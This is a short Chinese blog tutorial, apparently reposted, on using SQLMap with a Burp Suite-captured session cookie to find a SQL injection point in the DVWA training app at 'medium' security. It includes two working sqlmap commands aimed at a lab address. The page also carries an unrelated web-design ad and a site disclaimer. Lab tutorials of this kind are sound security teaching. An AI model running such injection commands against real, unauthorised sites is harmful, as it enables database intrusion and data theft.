DVWA系列之4利用SQLMap進(jìn)行medium級別注入

下面我們嘗試?yán)肧QLMap進(jìn)行medium級別下的注入。

網(wǎng)站的建設(shè)成都創(chuàng)新互聯(lián)專注網(wǎng)站定制,經(jīng)驗(yàn)豐富,不做模板,主營網(wǎng)站定制開發(fā).小程序定制開發(fā),H5頁面制作!給你煥然一新的設(shè)計(jì)體驗(yàn)!已為雨棚定制等企業(yè)提供專業(yè)服務(wù)。

首先探測是否存在注入點(diǎn)，執(zhí)行下面的命令：

sqlmap.py -u http://192.168.80.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit

檢測結(jié)果沒有發(fā)現(xiàn)注入點(diǎn)，這是由于DVWA需要先登錄然后才能使用，因而這里需要得到當(dāng)前會話的cookie，用來在***過程中維持連接狀態(tài)。利用Burpsuite攔截?cái)?shù)據(jù)包，獲取cookie。

在SQLMap中加--cookie參數(shù)，繼續(xù)進(jìn)行注入。

sqlmap.py -u "http://192.168.80.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=2f120ee00f32798d11de936832312549"

這下成功探測到注入點(diǎn)。

關(guān)于sqlmap和Burpsuite以后會另行發(fā)個(gè)系列博文。

文章名稱：DVWA系列之4利用SQLMap進(jìn)行medium級別注入
標(biāo)題來源：http://muchs.cn/article26/pdjdcg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供云服務(wù)器、網(wǎng)站建設(shè)、網(wǎng)站設(shè)計(jì)公司、微信公眾號、關(guān)鍵詞優(yōu)化、面包屑導(dǎo)航

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)